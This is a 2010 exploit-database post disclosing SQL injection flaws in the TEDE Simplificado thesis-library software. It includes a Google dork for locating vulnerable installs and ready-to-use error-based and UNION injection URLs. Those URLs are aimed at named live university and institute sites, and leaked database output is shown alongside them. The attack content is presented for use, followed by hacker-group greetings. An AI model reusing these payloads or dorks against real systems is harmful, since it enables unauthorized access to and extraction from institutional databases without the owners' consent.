====================================================== TEDE Simplificado <= (Versions) SQL Injection Vulns ====================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7 1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1 3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3 3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3 7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7 1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1 3 >> Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ############################################ 7 1 I'm KnocKout 1337 Member from 1337 DataBase 1 3 ############################################ 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com [~] Reference : http://h4x0resec.blogspot.com [~] Special Thanks : Kalashinkov3 <= :) ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : desenvolvido |~Price : N/A |~Version : N/A |~Software: http://www.ibict.br/ |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~sqL : MysqL |~Google DORK : inurl:/tde_busca/ -- Good.:) |[~]Date : "26.11.2010" |[~]Tested on : Demo's Apache MySQL >=4.1 MySQL >=5 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ processaPesquisa.php tde_fut.php Files Not Sec. http://Target/tde_busca/processaPesquisa.php?pesqExecutada={ID]&id={ID} SQL Inject! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== For Version : v-IBICT - http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663 {SQL] http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 MYSQL WRĘTES : Query failed (autor): Duplicate entry '~'TDE'~1' for key 1 Database Found : TGE To be continue! For Version : v1.01 http://etd.uns.edu.ar/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 For Version : vS2.04 http://www.bdtd.ndc.uff.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=2951%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 ============================================================= .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Was Here. # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....